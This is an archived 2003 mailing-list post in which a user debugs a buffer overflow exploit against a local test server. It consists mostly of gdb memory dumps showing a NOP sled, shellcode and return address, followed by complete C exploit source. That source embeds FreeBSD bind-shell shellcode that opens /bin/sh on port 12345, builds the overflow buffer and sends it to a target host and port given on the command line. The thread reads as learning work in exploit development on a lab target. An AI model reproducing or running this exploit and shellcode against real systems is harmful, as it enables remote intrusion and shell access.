Vulnerability Development mailing list archives
Re: sample buffer overflow exploit problem
From: Ganbold <ganbold () micom mng net>
Date: Wed, 01 Oct 2003 10:06:52 +0900
Hi Orlando, I tested your modified exploit. When I run exploit with offset 320: ----------------------------------------------------------------------------------------------------------------------------- bash-2.05b$ ./expl_or 127.0.0.1 30460 320 scsize: 131 ret: 0xbfbffa40 bash-2.05b$ ----------------------------------------------------------------------------------------------------------------------------- In gdb on server I see: ----------------------------------------------------------------------------------------------------------------------------- (gdb) run 30460 The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/home/tsgan/bof_files/vulnerable 30460 client from 127.0.0.1 -----------------------------------------------------------------------------------------------------------------------------It binds shell to port 12345. When I make connection to it in gdb I see following:
----------------------------------------------------------------------------------------------------------------------------- (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. 0xbfbffa8f in ?? () (gdb) x/200bx $esp-200 0xbfbff9c8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbff9d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbff9d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbff9e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbff9e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbff9f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbff9f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa00: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa08: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa10: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa18: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa20: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa28: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa30: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa38: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa40: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83 ^^^^^^ shellcode begins 0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50 0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66 0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a 0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80 0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0 0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50 0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57 0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31 ----------------------------------------------------------------------------------------------------------------------------- As you see shellcode is not full, I see only half of my shellcode.So when exploit run server doesn't crash and binds shell port. But when I make connection to 12345 port, server crashes and x/200bx $esp-200 command shows above half of my shellcode.
Following is register information after crash: ----------------------------------------------------------------------------------------------------------------------------- (gdb) info all-registers eax 0x9 9 ecx 0xbfbffaec -1077937428 edx 0xbfbffacc -1077937460 ebx 0x9 9 esp 0xbfbffa90 0xbfbffa90 ebp 0xbfbffa40 0xbfbffa40 esi 0xbfbffb80 -1077937280 edi 0x8 8 eip 0xbfbffa8f 0xbfbffa8f eflags 0x10206 66054 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000) st1 -nan(0x000002000) (raw 0xffff0000000000002000) st2 0 (raw 0x00000000000000000000) st3 0 (raw 0x00000000000000000000) st4 0 (raw 0x00000000000000000000)st5 3.6715164242195896804332733154296875e-10 (raw 0x3fdfc9d8000000000000)
st6 24 (raw 0x4003c000000000000000) st7 60 (raw 0x4004f000000000000000) fctrl 0x127f 4735 fstat 0x0 0 ftag 0x0 0 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 ----------------------------------------------------------------------------------------------------------------------------- But when I run exploit with 0 offset I see different situation: ----------------------------------------------------------------------------------------------------------------------------- bash-2.05b$ ./expl_or 127.0.0.1 30460 0 scsize: 131 ret: 0xbfbffb80 bash-2.05b$ ----------------------------------------------------------------------------------------------------------------------------- In gdb on server I see: ----------------------------------------------------------------------------------------------------------------------------- (gdb) run 30460 The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/home/tsgan/bof_files/vulnerable 30460 client from 127.0.0.1 (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGILL, Illegal instruction. 0xbfbffb8c in ?? () (gdb) x/300bx $esp-300 0xbfbffa48: 0x90 0x90 0x90 0x6a 0x10 0x89 0xe1 0x83 ^^^^^^ shellcode begins 0xbfbffa50: 0xec 0x10 0x89 0xe3 0x31 0xc0 0x50 0x50 0xbfbffa58: 0x50 0x66 0x68 0x30 0x39 0xb4 0x20 0x66 0xbfbffa60: 0x50 0x89 0xe2 0x6a 0x06 0x6a 0x01 0x6a 0xbfbffa68: 0x02 0x50 0x30 0xe4 0xb0 0x61 0xcd 0x80 0xbfbffa70: 0x89 0xc7 0x6a 0x10 0x52 0x50 0x50 0xb0 0xbfbffa78: 0x68 0xcd 0x80 0x31 0xc0 0x50 0x57 0x50 0xbfbffa80: 0x83 0xc0 0x6a 0xcd 0x80 0x51 0x53 0x57 0xbfbffa88: 0x50 0xb0 0x1e 0xcd 0x80 0x89 0xc3 0x31 0xbfbffa90: 0xc0 0x50 0x53 0x50 0xb0 0x5a 0xcd 0x80 0xbfbffa98: 0xb0 0x01 0x50 0x53 0x50 0x83 0xc0 0x59 0xbfbffaa0: 0xcd 0x80 0xb0 0x02 0x50 0x53 0x50 0x83 0xbfbffaa8: 0xc0 0x58 0xcd 0x80 0x31 0xc0 0x50 0x68 0xbfbffab0: 0x2f 0x2f 0x73 0x68 0x68 0x2f 0x62 0x69 0xbfbffab8: 0x6e 0x89 0xe3 0x50 0x53 0x89 0xe2 0x50 0xbfbffac0: 0x52 0x53 0x50 0xb0 0x3b 0xcd 0x80 0x31 0xbfbffac8: 0xc0 0x40 0x50 0x50 0xcd 0x80 0x90 0x90^^^^^^ shellcode ends
0xbfbffad0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffad8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0xbfbffae0: 0x90 0x90 0x90 0x90 0x80 0xfb 0xbf 0xbf^^^^^^ return address
0xbfbffae8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffaf0: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffaf8: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffb00: 0x80 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffb08: 0x80 0xfb 0xbf 0x2c 0x20 0x6e 0x69 0x63 ^^^^^^ ends here 0xbfbffb10: 0x65 0x20 0x74 0x6f 0x20 0x6d 0x65 0x65 0xbfbffb18: 0x74 0x20 0x79 0x6f 0x75 0x21 0x0d 0x0a 0xbfbffb20: 0x00 0x00 0x00 0x00 0x74 0x02 0x76 0xfc 0xbfbffb28: 0x00 0x00 0x00 0x00 0x41 0xc6 0x04 0x28 0xbfbffb30: 0x7e 0xf7 0x0f 0x28 0x60 0x00 0x00 0x00 0xbfbffb38: 0x10 0x00 0x00 0x00 0x07 0x00 0x00 0x00 0xbfbffb40: 0x06 0x00 0x00 0x00 0x02 0x00 0x00 0x00 0xbfbffb48: 0x6c 0xfb 0xbf 0xbf 0x6c 0xfb 0xbf 0xbf 0xbfbffb50: 0x15 0x87 0x04 0x08 0x02 0x00 0x00 0x00 0xbfbffb58: 0x74 0xfb 0xbf 0xbf 0x80 0xfb 0xbf 0xbf 0xbfbffb60: 0x68 0xfb 0xbf 0xbf 0x00 0x00 0x00 0x00 0xbfbffb68: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0xbfbffb70: 0x02 0x00 0x00 0x00 ----------------------------------------------------------------------------------------------------------------------------- As you see I see all my shellcode and return address fully. Following is the register infos: ----------------------------------------------------------------------------------------------------------------------------- (gdb) info all-registers eax 0xffffffff -1 ecx 0x9 9 edx 0xffffffff -1 ebx 0x2 2 esp 0xbfbffb74 0xbfbffb74 ebp 0xbfbffb80 0xbfbffb80 esi 0xbfbffb80 -1077937280 edi 0xbfbffcb2 -1077936974 eip 0xbfbffb8c 0xbfbffb8c eflags 0x10246 66118 cs 0x1f 31 ss 0x2f 47 ds 0x2f 47 es 0x2f 47 fs 0x2f 47 gs 0x2f 47 st0 -nan(0x0000ca000) (raw 0xffff00000000000ca000) st1 -nan(0x000002000) (raw 0xffff0000000000002000) st2 0 (raw 0x00000000000000000000) st3 0 (raw 0x00000000000000000000) st4 0 (raw 0x00000000000000000000) st5 0 (raw 0x00000000000000000000) st6 0 (raw 0x00000000000000000000) st7 10 (raw 0x4002a000000000000000) fctrl 0x127f 4735 fstat 0x0 0 ftag 0x0 0 fiseg 0x0 0 fioff 0x0 0 foseg 0x0 0 fooff 0x0 0 fop 0x0 0 ----------------------------------------------------------------------------------------------------------------------------- I'm very confused and I don't know yet what to do. Please give me some advice. thanks in advance, Ganbold At 01:45 PM 9/30/2003 -0500, you wrote:
attachment #include <stdio.h> #include <netinet/in.h> #include <netdb.h> #include <sys/socket.h> #include <sys/types.h> #include <errno.h> #include <unistd.h> /* * FreeBSD shellcode - binds /bin/sh to a port 12345 * * Claes M. Nyberg 20020619 * * <cmn () darklab org>, <md0claes () mdstud chalmers se> */ char shellcode[] = /* port _______*/ "\x6a\x10\x89\xe1\x83\xec\x10\x89\xe3\x31\xc0\x50\x50\x50\x66\x68\x30\x39" "\xb4\x20\x66\x50\x89\xe2\x6a\x06\x6a\x01\x6a\x02\x50\x30\xe4\xb0\x61\xcd" "\x80\x89\xc7\x6a\x10\x52\x50\x50\xb0\x68\xcd\x80\x31\xc0\x50\x57\x50\x83" "\xc0\x6a\xcd\x80\x51\x53\x57\x50\xb0\x1e\xcd\x80\x89\xc3\x31\xc0\x50\x53" "\x50\xb0\x5a\xcd\x80\xb0\x01\x50\x53\x50\x83\xc0\x59\xcd\x80\xb0\x02\x50" "\x53\x50\x83\xc0\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\x50\xb0\x3b\xcd\x80\x31\xc0" "\x40\x50\x50\xcd\x80"; #define RET 0xbfbffb80 //0xbfbffa48 int exec_sh(int sockfd) { char snd[4096],rcv[4096]; fd_set rset; while(1) { FD_ZERO(&rset); FD_SET(fileno(stdin),&rset); FD_SET(sockfd,&rset); select(255,&rset,NULL,NULL,NULL); if(FD_ISSET(fileno(stdin),&rset)) { memset(snd,0,sizeof(snd)); fgets(snd,sizeof(snd),stdin); write(sockfd,snd,strlen(snd)); } if(FD_ISSET(sockfd,&rset)) { memset(rcv,0,sizeof(rcv)); if(read(sockfd,rcv,sizeof(rcv))<=0) exit(0); fputs(rcv,stdout); } } } int main(int argc, char *argv[]) { char buffer[1064]; int s,t, i, size,offset; struct sockaddr_in remote; struct hostent *host; if(argc != 4) { printf("Usage: %s target-ip port offset\n", argv[0]); return -1; } offset = RET - atoi(argv[3]); // filling buffer with NOPs memset(buffer, 0x90, 1064); printf("scsize: %d\nret: 0x%x\n",sizeof(shellcode)-1,offset); //copying shellcode into buffer memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode)-1); // Copying the return address multiple times at the end of the buffer... for(i=1022; i < 1060; i+=4) { * ((int *) &buffer[i]) = offset; } buffer[1061] = 0x0; //getting hostname host=gethostbyname(argv[1]); if (host==NULL) { fprintf(stderr, "Unknown Host %s\n",argv[1]); return -1; } // creating socket... s = socket(AF_INET, SOCK_STREAM, 0); if (s < 0) { fprintf(stderr, "Error: Socket\n"); return -1; } remote.sin_family = AF_INET; remote.sin_addr = *((struct in_addr *)host->h_addr); remote.sin_port = htons(atoi(argv[2])); // connecting with destination host if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) { close(s); fprintf(stderr, "Error: connect\n"); return -1; } //sending exploit string size = send(s, buffer, sizeof(buffer), 0); if (size==-1) { close(s); fprintf(stderr, "sending data failed\n"); return -1; } /* printf("[-] Connecting to bindshell...\n"); remote.sin_family = AF_INET; remote.sin_addr = *((struct in_addr *)host->h_addr); remote.sin_port = htons(12345); if (connect(s, (struct sockaddr *)&remote, sizeof(remote))==-1) { close(s); fprintf(stderr, "Error: connect\n"); return -1; } exec_sh(s); */ // closing socket close(s); }
Current thread:
- Re: sample buffer overflow exploit problem Ganbold (Oct 01)
- <Possible follow-ups>
- Re: sample buffer overflow exploit problem Ganbold (Oct 01)